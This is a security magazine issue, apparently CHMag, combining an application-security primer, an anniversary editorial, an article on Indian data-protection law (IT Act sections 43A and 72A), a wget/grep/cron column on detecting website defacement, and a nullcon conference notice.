The Institute for Security and Open Methodologies (ISECOM) defines security as "a form of protection where a separation is created between the assets and the threat". Security in general has many categories: it can be the security of physical assets like a home, an airport or infrastructure, or some kind of political security like human security or national security, or computer security, which itself has many categories. Despite so many categories of security, two entities are always involved, i.e. Asset and Threat. In all scenarios the "asset" has to be protected from the "threat". Considering our home security, we all lock our doors before going out. Here the home is the asset and the threat is the thieves. If the thief is intelligent enough he will gather all our information, like at what time the home is usually vacant, how many people live there, or what kind of lock you have applied. All this information will help him to breach your home security. Similarly in the IT security world, the asset may be the data flowing through a network, or data stored on a server or in a database, and the threats are the hackers. Same as for thieves, the hacker's first step is "Information Gathering".
With reference to information security we can divide security into categories like Application Security, Data Security, Network Security and others. In this article we will focus more on the basics of Application Security. 'Wiki' says Application security encompasses measures taken throughout the application's life-cycle to prevent exceptions in the security policy of an application or the underlying system (vulnerabilities) through flaws in the design, development, deployment, upgrade, or maintenance of the application. In simple words it comprises the security issues involved in any type of application, including but not limited to Java, PHP, C++, and Python.
Application Security Trends The world of internet is growing in tremendous way with IPv4 addresses getting depleted. With growth in number of users, sophistication in technology, the attack vectors have also increased. The graph below shows the study by SANS institute, depicting the growth in the number of attack vectors in first half of year 2010.
Thus, with the increasing sophistication and number of attacks and defense techniques, it has become a cat and mouse game. Attacks earlier focused on the operating systems themselves. However, with continuous effort and improvement on the operating systems, vulnerabilities have become difficult to find in them, resulting in a shift of the fulcrum from the operating system to targeted applications. The graph below shows the trend for four popular applications, i.e. Adobe Reader, MS Word, MS Excel and MS PowerPoint. If you look at Adobe, you will see that the vulnerabilities increased drastically for year 2010.
So, it can be said that the two sides of application security, both good and bad, are in a constant state of evolution.
The malicious guy comes in: THE HACKER
There might be some guys with malicious intent who are looking to compromise your assets. They might be technology geeks, freaks and motivated hackers, attacking your applications just for fun, or for profit. Many times, they are also funded by high profile companies or even governments to target the sensitive data and assets of the companies or countries they are in competition with. The well known Stuxnet worm and the Aurora attacks are just a few examples of this; however, there might be many attacks that go unnoticed by governments and organizations.
These attackers try to gather as much information as possible about the target. This involves a lot of searching on search engines, news groups, job sites, your own site, public forums, and social networks like Facebook, MySpace, Orkut etc. A lot of information can be harvested in this manner, which can later be misused to breach security. This information includes email ids, dates of birth, likes and dislikes, girlfriends and boyfriends, the software used in the company, location and much more. A popular quote in the hacking world says "Deterministic hackers spend 90% of their time in information gathering phase, rest 10% is spent on the breach".
Knowing the threats: Build your walls strong enough
The assets need to be secured from the threats. However, to secure the assets, there needs to be proper knowledge of the boundaries of the application from which input comes. In other words, the first rule of security is "the user input MUST not be trusted". So, to secure the application, the application castle should be strong enough to stop malicious input at the walls themselves. This approach is called input validation. The other approach is that even if the enemy enters the castle, don't let them get away, or cripple them. This approach is termed output validation. These threats can come from any input, which may include a form field, URL, cookies, POST parameters etc. These inputs should not be trusted in any manner, as this "trust" is what leads to the compromise.
Deeply understanding the threats: Ohh… they are so many
The attack techniques have evolved over time, and there are many ways in which applications can be compromised. The attacks include, but are not limited to, the following:
- Cross site scripting
- SQL injection
- Buffer overflows
- Cross site request forgery
- XPATH injection
- Format string attacks
- Heap overflows
- Redirection attacks
- Authentication attacks
- Authorization attacks
- Canonicalization attacks
- OS commanding
- SSI includes
- Parameter pollution
- Session based attacks
- Sniffing
- Spoofing
- Phishing
These are only a few examples. Many more exist and the list keeps getting updated on a regular basis. A simple Google search on "Cross site scripting" or any of these will give you thousands of results, which are enough to explain the vulnerability. There are many security projects (OWASP) and institutes (SANS) working to create freely available articles, methodologies, documentation, tools, and technologies to provide unbiased, practical, cost-effective information about application security. These communities also release a list of the top vulnerabilities at regular intervals.
Save Me Please
For each of the vulnerabilities, there exist different ways to mitigate them. However, speaking generically, all the vulnerabilities can be prevented by proper validation, both on input and on output. If only one of these is done, the vulnerability can surely be exploited by an attacker. So, it is always better to have a two-way defense mechanism, which acts as a double shield to prevent attacks against the application. When an application is developed, an approach that ensures both these validations at the same time should be followed. This is the best possible solution to mitigate the attacks. As far as targeted applications like Acrobat Reader or Microsoft applications are concerned, the only way to save yourself is to install the updates released by the vendors. Even if you miss a single update, your machine is vulnerable to any type of attack. Presently there are many tools to prevent applications from getting hacked, but in the end it's in the hands of the application developer to make his application secure enough: not only to check that all the doors are locked, but to ensure that every other entry point is also locked and secured.
Conclusion
Thus, we can conclude that the threats to applications are on a continuous rise, and developers need to be aware of these and educate themselves so as to involve a secure methodology in the lifecycle of the development. These vulnerabilities are large in number, and hence require a thorough study.
Ankur Bhargava Working as a security researcher in Infosys Technologies, his daily job includes malware analysis, detection and prevention, network and application penetration testing and secure code review.
Saurabh Sharma He is working in Infosys Technologies Limited. His primary responsibility is to provide Enterprise Security Solutions to our clients. He has a good understanding on Application Security dealing with Threat Modeling, Secure code analysis and Penetration testing.
CHMag: 06.02.2010 to 06.02.2011
It is a matter of rejoicing for us to see CHMag entering its second year of publication. Considering the overwhelming response of the people, we feel that we are on the right track towards our objective. When we look into the past, a wave of exhilaration passes through us and we also wonder how we could do it. We had heard that an idea could change lives or that a lot of things could take place over a cup of coffee, but had never experienced it. We experienced it only when we froze on the idea of starting a magazine over a cup of coffee. After we finished the ClubHack 2009 conference, a question was tossed up in our casual meetings: what next after the ClubHACK conference? It led to a brainstorming session wherein an idea was conceived: why not start a magazine on security and hacking to make people aware about hacking as well as to provide a creditable platform for security professionals, experts and engineers to share their ideas and knowledge? Till that time, in India, there was no such magazine dedicated solely to security and hacking. Consensus was reached over the idea and it gave birth to CHMag.
The idea was frozen, but the next challenge was how to go ahead with it. Our enthusiasm was so great that we decided our strategy and divided the job into tasks; everybody worked very hard with amazing dedication and at last our efforts bore a sweet fruit. It was an amazing journey from 'seemingly impossible' to 'just possible'. And so after a lot of thinking and planning we came out with the 1st issue on 6th Feb, 2010 at nullcon, an International Hacking and Security Conference. And so CHMag – First Indian "Hacking" Magazine was born.
To make it more interesting and cover a wide range of audience, we came up with 5 dedicated sections – Tech Gyan, Mom's Guide, Tool Gyan, Command Line and Legal Gyan. Initially we wrote a few articles by ourselves. Since we are also students, it was hard to manage college and magazine work at the same time. But as time progressed, professionals from the industry started to contribute. Many of them wanted to publish their papers in our magazine and we are glad they chose our magazine as a platform to publish their work. The main contribution comes from security professionals, but contributions have also come from security enthusiasts and students.
There are international contributors as well. In fact they are quite well known in the circle, namely, Raoul Chiesa (Senior Advisor of UNICRI), Dror Shalev and Oren Barad. And it was a great achievement for us to have one of our issues released by the famous security guru Bruce Schneier. Good news! We are coming out with a couple of new sections. One section is 'Events', wherein we will be covering various security events through our CHMag. The second is more of a secret right now. If we disclose it here, tiger will kill us! ;-) Stay tuned with us for more updates on this secret.
Testimonials
Here are a few testimonials from the experts, contributors and readers.
"Thousands may claim to be the first, but everyone knows - who is the first, the best, and provides you with the latest – no doubt – it’s the one and only ClubHack Magazine. I am extremely happy to see the dedicated, committed and quality work by the CHMag Team. I am sure that they will continue to deliver up-to-date and rich content in the coming days to quench our lust for knowledge. Wishing all the very best to CHMag Team – Happy Hacking :) " - Manu Zacharia MVP (Enterprise Security), ISLA-2010 (ISC)², C|EH, C|HFI, CCNA, MCP, AFCEH Certified ISO 27001:2005 LA
“Well, beside having been the "2010 Santa Claus" for ClubHACK Magazine, I do always totally enjoy reading each new issue:-) Aside from those incredibly smart security posters that came out every month along with the magazine, Rohit Srivastwa and his team in one year made an excellent job, dealing with the Technology, Tools, the lovely "Mom's Guide", the legal aspects and the Command Line tutorials. All of us from the InfoSec community should be thankful to ClubHACK Magazine!” - Raoul "Nobody" Chiesa Ethical Hacker, Cybercrime Senior Advisor at the United Nations (UNICRI)
"The content covered in CHMag interests a wide range of audience, providing valuable information for the novice and a handy reference to the geeks. This drive has educated and inspired tons of people from across the world. Proud to be a part of team ClubHACK". - Tushar Dalvi, Information Security Institute. Johns Hopkins University.
“When I came to know about CHMag, I was eager to see what actually these guys were going to publish. I was really amazed by looking at the classification of articles in sections like Tech Gyan, Tool Gyan, Legal Gyan, etc. That's what CHMag did well. It is really easy for me to read articles as per our interests in computer security. Everything is here on CHMag. Also CHMag members provide the opportunity to publish articles written by readers as well. I have posted one for them and am looking forward to posting again for CHMag. I congratulate all the ClubHACK guys for such a GREAT initiative in the computer security field and wish them to be number 1 in the world...” - Sagar Nangare Web developer, SEO expert.
“ClubHack magazine is the work of a young and passionate team. The magazines are zero BS and 100% useful content. I have been lucky enough to meet the guys behind the show and they are as cool as the mag itself. Great show guys!" - Lava Kumar Penetration Tester, Security Researcher.
“I look forward to reading the ClubHack magazine every month. Their topics are structured and well laid out. Their authors have definite deep knowledge of the topics they write on. Wishing CHMag a happy birthday and looking forward to more editions in years to come”. - Prasanna Kanagasabai Independent Information Security researcher
We are glad to see that many security professionals have chosen us as an authentic platform to publish their papers. This overwhelming response from the community has kept us going and we will keep doing our best in the pursuit of excellence in cyber security. It is a moment of great rejoicing for us, and we salute all our supporters. We thank you for your support.
Varun Hirve Pankit Thakkar varun@chmag.in pankit@chmag.in
Co-founders, CHMag
Data Protection and Corporate Liability
India – The Emerging IT super power
In the recent years India has emerged as one of the preferred destinations for offshore business in outsourcing, financial, educational, legal, banking, healthcare, marketing and telecommunication services. The factors that have turned India into one of the hotspots for offshore outsourcing are the educated and unemployed masses, enterprising nature of Indians who have excellent spoken English skills and relatively cheap labour. Business Process Outsourcing, popularly called BPO, is the industry which is multiplying by the day in India.
The Black side
In April 2005, five employees of MsourcE in Pune were arrested for allegedly pulling off a fraud worth nearly Rs 2.5 crore from Citibank accounts of four New York-based account holders. In June 2005, the British tabloid Sun conducted a sting operation by purchasing the bank account details of 1,000 Britons for about 5.50 dollars each from Karan Bahree, an employee of Gurgaon-based BPO Company Infinity E-Search. Similarly, in June 2006, Nadeem Kashmiri, an employee at HSBC's call center in Bangalore, sold the customer's credit card information to a group of scamsters who used the information to siphon off nearly Rs 1.8 crore from bank accounts of UK-based customers. In another 3 months, the Channel 4 data theft scandal hit the headlines, and coincidentally, it was also UK based.
All these incidents sparked off a debate among the offshore industry circles, media and the legal world as to how safe foreign data is in Indian hands. The discussions also veered towards the need for some kind of protection for personal data in India, which is currently absent.
Cyber security has always been and continues to be a critical area for organizations and will continue to increase in importance as attacks become stealthier, have a greater financial impact on an organization, and cause reputational damage.
The Law
It is significant to note that by the recent amendments to the Information Technology Act, 2000, Indian Government has provided a new legal direction to data protection and privacy.
Two new Sections have been inserted by the amendment that focus on corporate liability in case of breach of privacy. These are:
Sec. 43A Compensation for failure to protect data
Where a body corporate, possessing, dealing or handling any sensitive personal data or information in a computer resource which it owns, controls or operates, is negligent in implementing and maintaining reasonable security practices and procedures and thereby causes wrongful loss or wrongful gain to any person, such body corporate shall be liable to pay damages by way of compensation to the person so affected.
Explanation. — For the purposes of this section,—
(i) "Body corporate" refers to any company and includes a firm, sole proprietorship or any other association of individuals who engaged in commercial or professional activities;
(ii) "reasonable security practices and procedures" means security practices and procedures designed to protect such information from unauthorized access, damage, use, modification, disclosure or impairment, as may be specified in an agreement between the parties or as may be specified in any law for the time being in force and in the absence of such agreement or any law, such reasonable security practices and procedures, as may be prescribed by the Central Government in consultation with such professional bodies or associations as it may deem fit;
(iii) "sensitive personal data or information" means such personal information as may be prescribed by the Central Government in consultation with such professional bodies or associations as it may deem fit.
Here, amount of damages to be paid by the way of compensation is unlimited.
Power of adjudication of offences committed under Sec. 43A is with the “Adjudicating Officer” if the amount of compensation claimed is upto Rupees Five Crore; if it is above Rupees Five Crore then it is with the “Civil Court”.
This Section imposes liability on corporate entities to ensure adoption of Reasonable Security Practices for the protection of Sensitive Personal Information of customers. Hence, Banks, Call centers, BPO's, etc are under legal scanner to ensure adoption of reasonable security practices to maintain secrecy of data, otherwise they will be legally liable to pay damages.
Illustration:-
Some employees of a famous multinational bank leaked out sensitive personal information of its customers without their consent. In such a case, the bank can be held liable under this Section for failure to adopt reasonable security practices for the protection of the Sensitive Personal Information.
Sec. 72A Punishment for disclosure of information in breach of lawful contract
Save as otherwise provided in this Act or any other law for the time being in force, any person including an intermediary who, while providing services under the terms of lawful contract, has secured access to any material containing personal information about another person, with the intent to cause or knowing that he is likely to cause wrongful loss or wrongful gain discloses, without the consent of the person concerned, or in breach of a lawful contract, such material to any other person, shall be punished with imprisonment for a term which may extend to three years, or with fine which may extend to five lakh rupees, or with both.
This Section specifically imposes liability on intermediary, or any person or a corporate body which discloses personal information of users while providing services under lawful contract. Hence now Banks, BPO's, Call centers, ISP's, Mobile Network Service providers etc are under a legal scanner to maintain the privacy of customer's private data.
Illustration:
"Lex Experts", an LPO (Legal Process Outsourcing Company) is working on the introduction of an IPO (Initial Public Offer) of a company. While working on it, they had access to confidential financial information about a company including Balance-sheets of previous financial years, list of Creditors, Shareholding pattern of a Company, etc which is supposed to be kept in privacy. Some employees of that LPO leaked out this confidential information to a rival company in return of huge amount of money. In this case, they can be held liable under Section 72A for disclosure of information in breach of lawful contract.
Power of adjudication of offence committed under Section 72A is with Judicial Magistrate First Class or Metropolitan Magistrate (In Metro Cities).
Conclusion
The recent amendments in the Information Technology Act, 2000 have introduced the concept of Data privacy in India for the first time. Prior to this there were no express provisions for Data Privacy. As per the amendments, corporate bodies now are under obligation to ensure the adoption of reasonable security practices for prevention of misuse of data. However, law is still not clear about defining what “reasonable security practices” are. Additionally, the Information Technology Act, 2000 is not a data or privacy protection legislation per se. It does not lay down any specific data protection or privacy principles. It is a generic legislation, which focuses on many issues.
Sagar Rahukar sr@asianlaws.org
Sagar Rahukar, a Law graduate, is Head (Maharashtra) at Asian School of Cyber Laws. Sagar specializes in Cyber Law, Intellectual Property Law and Corporate Law. Sagar also teaches law at numerous educational institutes and has also trained officials from various law enforcement agencies.
Monitor Your Website
While the whole issue was talking about web security, I thought of writing something on the same lines. In this issue of command line gyan, we'll see how we can monitor our websites automatically so as to get notified if anyone defaces them. There is nothing very great in this, and there are a lot of services giving this feature cheaply, but the fun is to write your own dirty little script to help you. So here it goes.
Linux
We are going to use a few tiny Linux commands to make our monitoring utility:
a) Wget – it downloads a file from the web
b) Mail – it sends mail
c) Cron – it runs scheduled tasks repetitively
d) Grep – our best text search friend
So now we'll see how we can use them together to achieve our objective.
    wget http://chmag.in
will download the homepage of the CHMag website. This produces some verbose noise, so we can use wget -q to run in quiet mode.
    grep "Welcome to CHMag"
will search for the text. Now if we club them together:
    wget -q http://chmag.in | grep "Welcome to CHMag"
This will download the homepage & search for the text. No, this will not :) This will download the file & grep will not get anything. So we'll have to redirect the output of wget to standard output & then grep it. This makes the command look like:
    wget -q -O - http://chmag.in | grep "Welcome to CHMag"
Now suppose the website is not available due to some web attack, which may include DOS, complete homepage defacement or server crash. In such cases you'll not be able to download the actual page with your text on it, and we can use that logic to create an alert. So now we have added an "if", "then", "else" logic here:
    if [[ `wget -q -O - http://chmag.in/ | grep "Welcome to CHMag"` == "" ]]; then echo "Something is wrong"; fi
OK perfect, this helps. But do we need to run it every time we need to check the website? No, let's put this in a cron job & make a mail alert. That's easy. Simply create a new CRON entry which looks like this:
    # [[ ]] is a bash construct; cron runs jobs with /bin/sh unless told otherwise
    SHELL=/bin/bash
    MAILTO=you@someotherdomain.com
    10 * * * * if [[ `wget -q -O - http://chmag.in/ | grep "Welcome to CHMag"` == "" ]]; then echo "Something is wrong"; fi
Now your cron task will run on the 10th minute of every hour and send you a mail if anything is wrong with the website. This is just a brain teaser for you; you can use your own imagination now to twist it to suit your need better.
This will not work if only a part of your website is defaced, leaving your original text in place, such as someone managing to write a malicious post on your blog through SQL injection or some other web attack, without deleting the core content. In such cases you can look for specific words such as "hacked" & then raise an alert. CHMag for sure can't use this keyword & you know why.
Windows
Sorry, the work is not that easy here. I haven't tried a lot on Windows because such things suit a Linux environment only. Having said that, let me tell you that it's not impossible to use it on Windows.
Options: The best one would be Cygwin :D OR
- Wget Windows binary
- Grep can be replaced by the “find” command (tedious job here)
- Tools like “bmail” can be used to send mails from the command line in Windows
- Scheduled tasks can also be created
So now it's your homework to create a Windows alternative to this Linux fun monitoring job & send us an article; we'll cover the same in our next issue.
Happy monitoring
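The Linux check built up in this column, combined with the keyword test suggested for partial defacement, can be written as one script that separates "page unreachable", "marker text gone" and "suspicious keyword present". This is an added example, not the author's script: the keyword list, the function names and the script path in the crontab comment are assumptions, and the sample pages are constructed.

```shell
#!/bin/sh
# Added example: defacement check meant to be run from cron.
# MARKER is the text the article greps for; BAD_WORDS is an assumed list.
MARKER="Welcome to CHMag"
# Extended regex, matched case-insensitively. Keep out any word your own
# pages use legitimately, or every run will raise an alert.
BAD_WORDS="hacked|defaced|owned by"

# classify_page FILE: print UNREACHABLE, MARKER_MISSING, KEYWORD_FOUND or OK.
classify_page() (
    page=$1
    # A missing or empty file means the download failed or returned nothing.
    [ -s "$page" ] || { echo UNREACHABLE; exit 0; }
    # -F treats the marker as a literal string rather than a regex.
    grep -qF -- "$MARKER" "$page" || { echo MARKER_MISSING; exit 0; }
    # The marker survived, so look for text a defacer may have added.
    if grep -qiE -- "$BAD_WORDS" "$page"; then
        echo KEYWORD_FOUND
        exit 0
    fi
    echo OK
)

# check_site URL: fetch the page, stay silent when healthy, otherwise print
# one line and return 1. cron mails any output to MAILTO, so silence = no mail.
check_site() (
    url=$1
    tmp=$(mktemp) || exit 2
    # On any wget failure, empty the file so a partial body is not classified.
    wget -q --timeout=20 --tries=2 -O "$tmp" "$url" || : > "$tmp"
    status=$(classify_page "$tmp")
    rm -f "$tmp"
    [ "$status" = OK ] && exit 0
    echo "$(date -u '+%Y-%m-%dT%H:%M:%SZ') $url $status"
    exit 1
)

# demo: classify four constructed pages (not real captures), one per outcome.
demo() (
    d=$(mktemp -d) || exit 2
    printf '<h1>Welcome to CHMag</h1><p>Issue 13</p>\n' > "$d/healthy.html"
    printf '<h1>Site under maintenance</h1>\n' > "$d/replaced.html"
    printf '<h1>Welcome to CHMag</h1><p>HaCkEd by nobody</p>\n' > "$d/partial.html"
    : > "$d/empty.html"
    for f in healthy replaced partial empty; do
        printf '%s=%s\n' "$f" "$(classify_page "$d/$f.html")"
    done
    rm -rf "$d"
)

# With a URL argument, check that site; with none, run the offline demo.
# Example crontab line (script path is hypothetical):
#   10 * * * * /usr/local/bin/sitecheck.sh http://chmag.in/
if [ "$#" -ge 1 ]; then check_site "$1"; else demo; fi
```

Because the script uses only POSIX sh constructs, the crontab line needs no SHELL override, and the distinct status words let the mail subject or a log filter tell an outage from a content change.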
Rohit Srivastwa rohit@clubhack.com
n|uCON 25-26th Feb, Goa
Registration: http://nullcon.net/register (online and offline)
null – The open security community (registered non-profit society) is back with the second edition of nullcon Goa – International Security Conference. We are proud to inform you that we have become the largest and the most talked about security conference by sticking to our core values i.e. providing latest and cutting edge research in information security in a vendor neutral environment. We invite you to join us at Goa and experience the future of information security.
Date: 25-26th Feb 2011
Venue: The RETREAT by Zuri, Pedda, Uttor Doxi, Varca, Salcete, Goa 403 721
Events
- Battle Underground – Capture the flag at nullcon. 1st Prize - SANS Hacking class worth USD $4095
- CXO Track – Talks with focus on Business angle to security for CXOs/managers
- Tech Track – Deep knowledge research talks focusing on infosec and latest hacker techniques
- Workshop – Workshops on Latest Research in malware and open source intelligence
- Mehfil-E-Mausiqi – null Networking Party
STATUTORY WARNING: nullcon can cause severe exposure to high octane Gyan and could leave participants exhausted with wild shack parties. Beware, Be There.
Note: - If you want to cover your Hacking/Security event mail us at info@chmag.in